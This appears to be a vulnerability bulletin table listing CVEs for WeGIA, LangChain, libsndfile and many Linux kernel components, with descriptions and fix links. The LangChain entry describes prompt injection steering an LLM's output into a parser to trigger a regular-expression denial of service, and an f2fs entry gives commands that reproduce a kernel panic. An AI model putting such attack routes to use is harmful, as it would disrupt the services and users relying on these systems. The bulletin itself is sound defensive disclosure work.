| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarDescricao and nomeClasse=ProdutoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23729 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-w88p-v7h6-m728 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=ProdutoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23730 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6gx4-6gwv-cxc3 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LangChain AI--LangChain | LangChain versions up to and including 0.3.1 contain a regular expression denial-of-service (ReDoS) vulnerability in the MRKLOutputParser.parse() method (libs/langchain/langchain/agents/mrkl/output_parser.py). The parser applies a backtracking-prone regular expression when extracting tool actions from model output. An attacker who can supply or influence the parsed text (for example via prompt injection in downstream applications that pass LLM output directly into MRKLOutputParser.parse()) can trigger excessive CPU consumption by providing a crafted payload, causing significant parsing delays and a denial-of-service condition. | 2026-01-12 | not yet calculated | CVE-2024-58340 | https://huntr.com/bounties/e7ece02c-d4bb-4166-8e08-6baf4f8845bb https://www.langchain.com/ https://github.com/langchain-ai/langchain https://www.vulncheck.com/advisories/langchain-mrkloutputparser-redos |
| Lemonsoft--WordPress add-on | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Lemonsoft WordPress add on allows Cross-Site Scripting (XSS).This issue affects WordPress add on: 2025.7.1. | 2026-01-13 | not yet calculated | CVE-2025-9427 | https://lemondoc.atlassian.net/wiki/spaces/LEMONSHOP/pages/754909038/Versiohistoria+-+Lemonsoft+integration+lis+osa |
| Libsndfile--Libsndfile | Libsndfile <=1.2.2 contains a memory leak vulnerability in the mpeg_l3_encoder_init() function within the mpeg_l3_encode.c file. | 2026-01-14 | not yet calculated | CVE-2025-56226 | https://github.com/libsndfile/libsndfile/issues/1089 https://gist.github.com/Sisyphus-wang/f9e6e017b7d478bebee6e8187672abc8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: Verify inode mode when loading from disk syzbot is reporting that S_IFMT bits of inode->i_mode can become bogus when the S_IFMT bits of the 16bits "mode" field loaded from disk are corrupted. According to [1], the permissions field was treated as reserved in Mac OS 8 and 9. According to [2], the reserved field was explicitly initialized with 0, and that field must remain 0 as long as reserved. Therefore, when the "mode" field is not 0 (i.e. no longer reserved), the file must be S_IFDIR if dir == 1, and the file must be one of S_IFREG/S_IFLNK/S_IFCHR/ S_IFBLK/S_IFIFO/S_IFSOCK if dir == 0. | 2026-01-13 | not yet calculated | CVE-2025-68767 | https://git.kernel.org/stable/c/6f768724aabd5b321c5b8f15acdca11e4781cf32 https://git.kernel.org/stable/c/d92333c7a35856e419500e7eed72dac1afa404a5 https://git.kernel.org/stable/c/001f44982587ad462b3002ee40c75e8df67d597d https://git.kernel.org/stable/c/05ec9af3cc430683c97f76027e1c55ac6fd25c59 https://git.kernel.org/stable/c/edfb2e602b5ba5ca6bf31cbac20b366efb72b156 https://git.kernel.org/stable/c/91f114bffa36ce56d0e1f60a0a44fc09baaefc79 https://git.kernel.org/stable/c/005d4b0d33f6b4a23d382b7930f7a96b95b01f39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inet: frags: flush pending skbs in fqdir_pre_exit() We have been seeing occasional deadlocks on pernet_ops_rwsem since September in NIPA. The stuck task was usually modprobe (often loading a driver like ipvlan), trying to take the lock as a Writer. lockdep does not track readers for rwsems so the read wasn't obvious from the reports. On closer inspection the Reader holding the lock was conntrack looping forever in nf_conntrack_cleanup_net_list(). Based on past experience with occasional NIPA crashes I looked thru the tests which run before the crash and noticed that the crash follows ip_defrag.sh. An immediate red flag. Scouring thru (de)fragmentation queues reveals skbs sitting around, holding conntrack references. The problem is that since conntrack depends on nf_defrag_ipv6, nf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its netns exit hooks run _after_ conntrack's netns exit hook. Flush all fragment queue SKBs during fqdir_pre_exit() to release conntrack references before conntrack cleanup runs. Also flush the queues in timer expiry handlers when they discover fqdir->dead is set, in case packet sneaks in while we're running the pre_exit flush. The commit under Fixes is not exactly the culprit, but I think previously the timer firing would eventually unblock the spinning conntrack. | 2026-01-13 | not yet calculated | CVE-2025-68768 | https://git.kernel.org/stable/c/c70df25214ac9b32b53e18e6ae3b8f073ffa6903 https://git.kernel.org/stable/c/006a5035b495dec008805df249f92c22c89c3d2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix return value of f2fs_recover_fsync_data() With below scripts, it will trigger panic in f2fs: mkfs.f2fs -f /dev/vdd mount /dev/vdd /mnt/f2fs touch /mnt/f2fs/foo sync echo 111 >> /mnt/f2fs/foo f2fs_io fsync /mnt/f2fs/foo f2fs_io shutdown 2 /mnt/f2fs umount /mnt/f2fs mount -o ro,norecovery /dev/vdd /mnt/f2fs or mount -o ro,disable_roll_forward /dev/vdd /mnt/f2fs F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 0 F2FS-fs (vdd): Mounted with checkpoint version = 7f5c361f F2FS-fs (vdd): Stopped filesystem due to reason: 0 F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 1 Filesystem f2fs get_tree() didn't set fc->root, returned 1 ------------[ cut here ]------------ kernel BUG at fs/super.c:1761! Oops: invalid opcode: 0000 [#1] SMP PTI CPU: 3 UID: 0 PID: 722 Comm: mount Not tainted 6.18.0-rc2+ #721 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:vfs_get_tree.cold+0x18/0x1a Call Trace: <TASK> fc_mount+0x13/0xa0 path_mount+0x34e/0xc50 __x64_sys_mount+0x121/0x150 do_syscall_64+0x84/0x800 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7fa6cc126cfe The root cause is we missed to handle error number returned from f2fs_recover_fsync_data() when mounting image w/ ro,norecovery or ro,disable_roll_forward mount option, result in returning a positive error number to vfs_get_tree(), fix it. | 2026-01-13 | not yet calculated | CVE-2025-68769 | https://git.kernel.org/stable/c/e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725 https://git.kernel.org/stable/c/0de4977a1eeafe9d77701e3c031a1bcdba389243 https://git.kernel.org/stable/c/9bc246018aaa3b46a7710428d0a2196c229f9d49 https://git.kernel.org/stable/c/a4c67d96f92eefcfa5596a08f069e77b743c5865 https://git.kernel.org/stable/c/473550e715654ad7612aa490d583cb7c25fe2ff3 https://git.kernel.org/stable/c/4560db9678a2c5952b6205fbca468c6805c2ba2a https://git.kernel.org/stable/c/01fba45deaddcce0d0b01c411435d1acf6feab7b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix XDP_TX path For XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not correct. __bnxt_poll_work() -> bnxt_rx_pkt() -> bnxt_rx_xdp() may be looping within NAPI and some event flags may be set in earlier iterations. In particular, if BNXT_TX_EVENT is set earlier indicating some XDP_TX packets are ready and pending, it will be cleared if it is XDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we successfully call __bnxt_xmit_xdp(). But if the TX ring has no more room, the flag will not be set. This will cause the TX producer to be ahead but the driver will not hit the TX doorbell. For multi-buf XDP_TX, there is no need to clear the event flags and set BNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in bnxt_rx_pkt(). The visible symptom of this is that the RX ring associated with the TX XDP ring will eventually become empty and all packets will be dropped. Because this condition will cause the driver to not refill the RX ring seeing that the TX ring has forever pending XDP_TX packets. The fix is to only clear BNXT_RX_EVENT when we have successfully called __bnxt_xmit_xdp(). | 2026-01-13 | not yet calculated | CVE-2025-68770 | https://git.kernel.org/stable/c/4b83902a1e67ff327ab5c6c65021a03e72c081d6 https://git.kernel.org/stable/c/f17e0c1208485b24d61271bc1ddc8f2087e71561 https://git.kernel.org/stable/c/0373d5c387f24de749cc22e694a14b3a7c7eb515 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix kernel BUG in ocfs2_find_victim_chain syzbot reported a kernel BUG in ocfs2_find_victim_chain() because the `cl_next_free_rec` field of the allocation chain list (next free slot in the chain list) is 0, triggring the BUG_ON(!cl->cl_next_free_rec) condition in ocfs2_find_victim_chain() and panicking the kernel. To fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(), just before calling ocfs2_find_victim_chain(), the code block in it being executed when either of the following conditions is true: 1. `cl_next_free_rec` is equal to 0, indicating that there are no free chains in the allocation chain list 2. `cl_next_free_rec` is greater than `cl_count` (the total number of chains in the allocation chain list) Either of them being true is indicative of the fact that there are no chains left for usage. This is addressed using ocfs2_error(), which prints the error log for debugging purposes, rather than panicking the kernel. | 2026-01-13 | not yet calculated | CVE-2025-68771 | https://git.kernel.org/stable/c/1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7 https://git.kernel.org/stable/c/d0fd1f732ea8063cecd07a3879b7d815c7ee71ed https://git.kernel.org/stable/c/b08a33d5f80efe6979a6e8f905c1a898910c21dd https://git.kernel.org/stable/c/96f1b074c98c20f55a3b23d2ab44d9fb0f619869 https://git.kernel.org/stable/c/e24aedae71652d4119049f1fbef6532ccbe3966d https://git.kernel.org/stable/c/7acc0390e0dd7474c4451d05465a677d55ad4268 https://git.kernel.org/stable/c/039bef30e320827bac8990c9f29d2a68cd8adb5f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid updating compression context during writeback Bai, Shuangpeng <sjb7183@psu.edu> reported a bug as below: Oops: divide error: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 11441 Comm: syz.0.46 Not tainted 6.17.0 #1 PREEMPT(full) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:f2fs_all_cluster_page_ready+0x106/0x550 fs/f2fs/compress.c:857 Call Trace: <TASK> f2fs_write_cache_pages fs/f2fs/data.c:3078 [inline] __f2fs_write_data_pages fs/f2fs/data.c:3290 [inline] f2fs_write_data_pages+0x1c19/0x3600 fs/f2fs/data.c:3317 do_writepages+0x38e/0x640 mm/page-writeback.c:2634 filemap_fdatawrite_wbc mm/filemap.c:386 [inline] __filemap_fdatawrite_range mm/filemap.c:419 [inline] file_write_and_wait_range+0x2ba/0x3e0 mm/filemap.c:794 f2fs_do_sync_file+0x6e6/0x1b00 fs/f2fs/file.c:294 generic_write_sync include/linux/fs.h:3043 [inline] f2fs_file_write_iter+0x76e/0x2700 fs/f2fs/file.c:5259 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x7e9/0xe00 fs/read_write.c:686 ksys_write+0x19d/0x2d0 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xf7/0x470 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The bug was triggered w/ below race condition: fsync setattr ioctl - f2fs_do_sync_file - file_write_and_wait_range - f2fs_write_cache_pages : inode is non-compressed : cc.cluster_size = F2FS_I(inode)->i_cluster_size = 0 - tag_pages_for_writeback - f2fs_setattr - truncate_setsize - f2fs_truncate - f2fs_fileattr_set - f2fs_setflags_common - set_compress_context : F2FS_I(inode)->i_cluster_size = 4 : set_inode_flag(inode, FI_COMPRESSED_FILE) - f2fs_compressed_file : return true - f2fs_all_cluster_page_ready : "pgidx % cc->cluster_size" trigger dividing 0 issue Let's change as below to fix this issue: - introduce a new atomic type variable .writeback in structure f2fs_inode_info to track the number of threads which calling f2fs_write_cache_pages(). - use .i_sem lock to protect .writeback update. - check .writeback before update compression context in f2fs_setflags_common() to avoid race w/ ->writepages. | 2026-01-13 | not yet calculated | CVE-2025-68772 | https://git.kernel.org/stable/c/ad26bfbc085c939b5dca77ff8c14798c06d151c4 https://git.kernel.org/stable/c/bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0 https://git.kernel.org/stable/c/0bf1a02494c7eb5bd43445de4c83c8592e02c4bf https://git.kernel.org/stable/c/0df713a9c082a474c8b0bcf670edc8e98461d5a0 https://git.kernel.org/stable/c/10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: fsl-cpm: Check length parity before switching to 16 bit mode Commit fc96ec826bce ("spi: fsl-cpm: Use 16 bit mode for large transfers with even size") failed to make sure that the size is really even before switching to 16 bit mode. Until recently the problem went unnoticed because kernfs uses a pre-allocated bounce buffer of size PAGE_SIZE for reading EEPROM. But commit 8ad6249c51d0 ("eeprom: at25: convert to spi-mem API") introduced an additional dynamically allocated bounce buffer whose size is exactly the size of the transfer, leading to a buffer overrun in the fsl-cpm driver when that size is odd. Add the missing length parity verification and remain in 8 bit mode when the length is not even. | 2026-01-13 | not yet calculated | CVE-2025-68773 | https://git.kernel.org/stable/c/c8f1d35076b78df61ace737e41cc1f4b7b63236c https://git.kernel.org/stable/c/9c34a4a2ead00979d203a8c16bea87f0ef5291d8 https://git.kernel.org/stable/c/837a23a11e0f734f096c7c7b0778d0e625e3dc87 https://git.kernel.org/stable/c/3dd6d01384823e1bd8602873153d6fc4337ac4fe https://git.kernel.org/stable/c/743cebcbd1b2609ec5057ab474979cef73d1b681 https://git.kernel.org/stable/c/be0b613198e6bfa104ad520397cab82ad3ec1771 https://git.kernel.org/stable/c/1417927df8049a0194933861e9b098669a95c762 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create When sync() and link() are called concurrently, both threads may enter hfs_bnode_find() without finding the node in the hash table and proceed to create it. Thread A: hfsplus_write_inode() -> hfsplus_write_system_inode() -> hfs_btree_write() -> hfs_bnode_find(tree, 0) -> __hfs_bnode_create(tree, 0) Thread B: hfsplus_create_cat() -> hfs_brec_insert() -> hfs_bnode_split() -> hfs_bmap_alloc() -> hfs_bnode_find(tree, 0) -> __hfs_bnode_create(tree, 0) In this case, thread A creates the bnode, sets refcnt=1, and hashes it. Thread B also tries to create the same bnode, notices it has already been inserted, drops its own instance, and uses the hashed one without getting the node. ``` node2 = hfs_bnode_findhash(tree, cnid); if (!node2) { <- Thread A hash = hfs_bnode_hash(cnid); node->next_hash = tree->node_hash[hash]; tree->node_hash[hash] = node; tree->node_hash_cnt++; } else { <- Thread B spin_unlock(&tree->hash_lock); kfree(node); wait_event(node2->lock_wq, !test_bit(HFS_BNODE_NEW, &node2->flags)); return node2; } ``` However, hfs_bnode_find() requires each call to take a reference. Here both threads end up setting refcnt=1. When they later put the node, this triggers: BUG_ON(!atomic_read(&node->refcnt)) In this scenario, Thread B in fact finds the node in the hash table rather than creating a new one, and thus must take a reference. Fix this by calling hfs_bnode_get() when reusing a bnode newly created by another thread to ensure the refcount is updated correctly. A similar bug was fixed in HFS long ago in commit a9dc087fd3c4 ("fix missing hfs_bnode_get() in __hfs_bnode_create") but the same issue remained in HFS+ until now. | 2026-01-13 | not yet calculated | CVE-2025-68774 | https://git.kernel.org/stable/c/3b0fc7af50b896d0f3d104e70787ba1973bc0b56 https://git.kernel.org/stable/c/39e149d58ef4d7883cbf87448d39d51292fd342d https://git.kernel.org/stable/c/b68dc4134b18a3922cd33439ec614aad4172bc86 https://git.kernel.org/stable/c/b9d1c6bb5f19460074ce9862cb80be86b5fb0a50 https://git.kernel.org/stable/c/457f795e7abd7770de10216d7f9994a3f12a56d6 https://git.kernel.org/stable/c/5882e7c8cdbb5e254a69628b780acff89c78071e https://git.kernel.org/stable/c/152af114287851583cf7e0abc10129941f19466a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/handshake: duplicate handshake cancellations leak socket When a handshake request is cancelled it is removed from the handshake_net->hn_requests list, but it is still present in the handshake_rhashtbl until it is destroyed. If a second cancellation request arrives for the same handshake request, then remove_pending() will return false... and assuming HANDSHAKE_F_REQ_COMPLETED isn't set in req->hr_flags, we'll continue processing through the out_true label, where we put another reference on the sock and a refcount underflow occurs. This can happen for example if a handshake times out - particularly if the SUNRPC client sends the AUTH_TLS probe to the server but doesn't follow it up with the ClientHello due to a problem with tlshd. When the timeout is hit on the server, the server will send a FIN, which triggers a cancellation request via xs_reset_transport(). When the timeout is hit on the client, another cancellation request happens via xs_tls_handshake_sync(). Add a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel path so duplicate cancels can be detected. | 2026-01-13 | not yet calculated | CVE-2025-68775 | https://git.kernel.org/stable/c/011ae80c49d9bfa5b4336f8bd387cd25c7593663 https://git.kernel.org/stable/c/e1641177e7fb48a0a5a06658d4aab51da6656659 https://git.kernel.org/stable/c/3c330f1dee3cd92b57e19b9d21dc8ce5970b09be https://git.kernel.org/stable/c/15564bd67e2975002f2a8e9defee33e321d3183f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() prp_get_untagged_frame() calls __pskb_copy() to create frame->skb_std but doesn't check if the allocation failed. If __pskb_copy() returns NULL, skb_clone() is called with a NULL pointer, causing a crash: Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f] CPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041 Code: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 <43> 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c RSP: 0018:ffffc9000d00f200 EFLAGS: 00010207 RAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480 RDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000 RBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee R10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000 R13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00 FS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0 Call Trace: <TASK> hsr_forward_do net/hsr/hsr_forward.c:-1 [inline] hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741 hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84 __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966 __netif_receive_skb_one_core net/core/dev.c:6077 [inline] __netif_receive_skb+0x72/0x380 net/core/dev.c:6192 netif_receive_skb_internal net/core/dev.c:6278 [inline] netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337 tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485 tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953 tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x5c9/0xb30 fs/read_write.c:686 ksys_write+0x145/0x250 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f0449f8e1ff Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48 RSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff RDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8 RBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000 R10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001 R13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003 </TASK> Add a NULL check immediately after __pskb_copy() to handle allocation failures gracefully. | 2026-01-13 | not yet calculated | CVE-2025-68776 | https://git.kernel.org/stable/c/3ce95a57d8a1f0e20b637cdeddaaed81831ca819 https://git.kernel.org/stable/c/c851e43b88b40bb7c20176c51cbf4f8c8d960dd9 https://git.kernel.org/stable/c/7be6d25f4d974e44918ba3a5d58ebb9d36879087 https://git.kernel.org/stable/c/8f289fa12926aae44347ca7d490e216555d8f255 https://git.kernel.org/stable/c/1742974c24a9c1f1fd2e5edca0cbaccb720b397a https://git.kernel.org/stable/c/6220d38a08f8837575cd8f830928b49a3a5a5095 https://git.kernel.org/stable/c/188e0fa5a679570ea35474575e724d8211423d17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: ti_am335x_tsc - fix off-by-one error in wire_order validation The current validation 'wire_order[i] > ARRAY_SIZE(config_pins)' allows wire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds access when used as index in 'config_pins[wire_order[i]]'. Since config_pins has 4 elements (indices 0-3), the valid range for wire_order should be 0-3. Fix the off-by-one error by using >= instead of > in the validation check. | 2026-01-13 | not yet calculated | CVE-2025-68777 | https://git.kernel.org/stable/c/a7ff2360431561b56f559d3a628d1f096048d178 https://git.kernel.org/stable/c/136abe173a3cc2951d70c6e51fe7abdbadbb204b https://git.kernel.org/stable/c/08c0b561823a7026364efb38ed7f4a3af48ccfcd https://git.kernel.org/stable/c/bf95ec55805828c4f2b5241fb6b0c12388548570 https://git.kernel.org/stable/c/84e4d3543168912549271b34261f5e0f94952d6e https://git.kernel.org/stable/c/40e3042de43ffa0017a8460ff9b4cad7b8c7cb96 https://git.kernel.org/stable/c/248d3a73a0167dce15ba100477c3e778c4787178 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: don't log conflicting inode if it's a dir moved in the current transaction We can't log a conflicting inode if it's a directory and it was moved from one parent directory to another parent directory in the current transaction, as this can result an attempt to have a directory with two hard links during log replay, one for the old parent directory and another for the new parent directory. The following scenario triggers that issue: 1) We have directories "dir1" and "dir2" created in a past transaction. Directory "dir1" has inode A as its parent directory; 2) We move "dir1" to some other directory; 3) We create a file with the name "dir1" in directory inode A; 4) We fsync the new file. This results in logging the inode of the new file and the inode for the directory "dir1" that was previously moved in the current transaction. So the log tree has the INODE_REF item for the new location of "dir1"; 5) We move the new file to some other directory. This results in updating the log tree to included the new INODE_REF for the new location of the file and removes the INODE_REF for the old location. This happens during the rename when we call btrfs_log_new_name(); 6) We fsync the file, and that persists the log tree changes done in the previous step (btrfs_log_new_name() only updates the log tree in memory); 7) We have a power failure; 8) Next time the fs is mounted, log replay happens and when processing the inode for directory "dir1" we find a new INODE_REF and add that link, but we don't remove the old link of the inode since we have not logged the old parent directory of the directory inode "dir1". As a result after log replay finishes when we trigger writeback of the subvolume tree's extent buffers, the tree check will detect that we have a directory a hard link count of 2 and we get a mount failure. The errors and stack traces reported in dmesg/syslog are like this: [ 3845.729764] BTRFS info (device dm-0): start tree-log replay [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c [ 3845.731236] memcg:ffff9264c02f4e00 [ 3845.731751] aops:btree_aops [btrfs] ino:1 [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff) [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8 [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00 [ 3845.735305] page dumped because: eb page dump [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5 [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701 [ 3845.737792] item 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160 [ 3845.737794] inode generation 3 transid 9 size 16 nbytes 16384 [ 3845.737795] block group 0 mode 40755 links 1 uid 0 gid 0 [ 3845.737797] rdev 0 sequence 2 flags 0x0 [ 3845.737798] atime 1764259517.0 [ 3845.737800] ctime 1764259517.572889464 [ 3845.737801] mtime 1764259517.572889464 [ 3845.737802] otime 1764259517.0 [ 3845.737803] item 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12 [ 3845.737805] index 0 name_len 2 [ 3845.737807] item 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34 [ 3845.737808] location key (257 1 0) type 2 [ 3845.737810] transid 9 data_len 0 name_len 4 [ 3845.737811] item 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34 [ 3845.737813] location key (258 1 0) type 2 [ 3845.737814] transid 9 data_len 0 name_len 4 [ 3845.737815] item 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34 [ 3845.737816] location key (257 1 0) type 2 [ ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-68778 | https://git.kernel.org/stable/c/d64f3834dffef80f0a9185a037617a54ed7f4bd2 https://git.kernel.org/stable/c/7359e1d39c78816ecbdb0cb4e93975794ce53973 https://git.kernel.org/stable/c/d478f50727c3ee46d0359f0d2ae114f70191816e https://git.kernel.org/stable/c/a35788ddf8df65837897ecbb0ddb2896b863159e https://git.kernel.org/stable/c/266273eaf4d99475f1ae57f687b3e42bc71ec6f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Avoid unregistering PSP twice PSP is unregistered twice in: _mlx5e_remove -> mlx5e_psp_unregister mlx5e_nic_cleanup -> mlx5e_psp_unregister This leads to a refcount underflow in some conditions: ------------[ cut here ]------------ refcount_t: underflow; use-after-free. WARNING: CPU: 2 PID: 1694 at lib/refcount.c:28 refcount_warn_saturate+0xd8/0xe0 [...] mlx5e_psp_unregister+0x26/0x50 [mlx5_core] mlx5e_nic_cleanup+0x26/0x90 [mlx5_core] mlx5e_remove+0xe6/0x1f0 [mlx5_core] auxiliary_bus_remove+0x18/0x30 device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 mlx5_rescan_drivers_locked+0xbc/0x2a0 [mlx5_core] [...] Do not directly remove psp from the _mlx5e_remove path, the PSP cleanup happens as part of profile cleanup. | 2026-01-13 | not yet calculated | CVE-2025-68779 | https://git.kernel.org/stable/c/e12c912f92ccea671b514caf371f28485714bb4b https://git.kernel.org/stable/c/35e93736f69963337912594eb3951ab320b77521 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/deadline: only set free_cpus for online runqueues Commit 16b269436b72 ("sched/deadline: Modify cpudl::free_cpus to reflect rd->online") introduced the cpudl_set/clear_freecpu functions to allow the cpu_dl::free_cpus mask to be manipulated by the deadline scheduler class rq_on/offline callbacks so the mask would also reflect this state. Commit 9659e1eeee28 ("sched/deadline: Remove cpu_active_mask from cpudl_find()") removed the check of the cpu_active_mask to save some processing on the premise that the cpudl::free_cpus mask already reflected the runqueue online state. Unfortunately, there are cases where it is possible for the cpudl_clear function to set the free_cpus bit for a CPU when the deadline runqueue is offline. When this occurs while a CPU is connected to the default root domain the flag may retain the bad state after the CPU has been unplugged. Later, a different CPU that is transitioning through the default root domain may push a deadline task to the powered down CPU when cpudl_find sees its free_cpus bit is set. If this happens the task will not have the opportunity to run. One example is outlined here: https://lore.kernel.org/lkml/20250110233010.2339521-1-opendmb@gmail.com Another occurs when the last deadline task is migrated from a CPU that has an offlined runqueue. The dequeue_task member of the deadline scheduler class will eventually call cpudl_clear and set the free_cpus bit for the CPU. This commit modifies the cpudl_clear function to be aware of the online state of the deadline runqueue so that the free_cpus mask can be updated appropriately. It is no longer necessary to manage the mask outside of the cpudl_set/clear functions so the cpudl_set/clear_freecpu functions are removed. In addition, since the free_cpus mask is now only updated under the cpudl lock the code was changed to use the non-atomic __cpumask functions. | 2026-01-13 | not yet calculated | CVE-2025-68780 | https://git.kernel.org/stable/c/9019e399684e3cc68c4a3f050e268f74d69c1317 https://git.kernel.org/stable/c/fb36846cbcc936954f2ad2bffdff13d16c0be08a 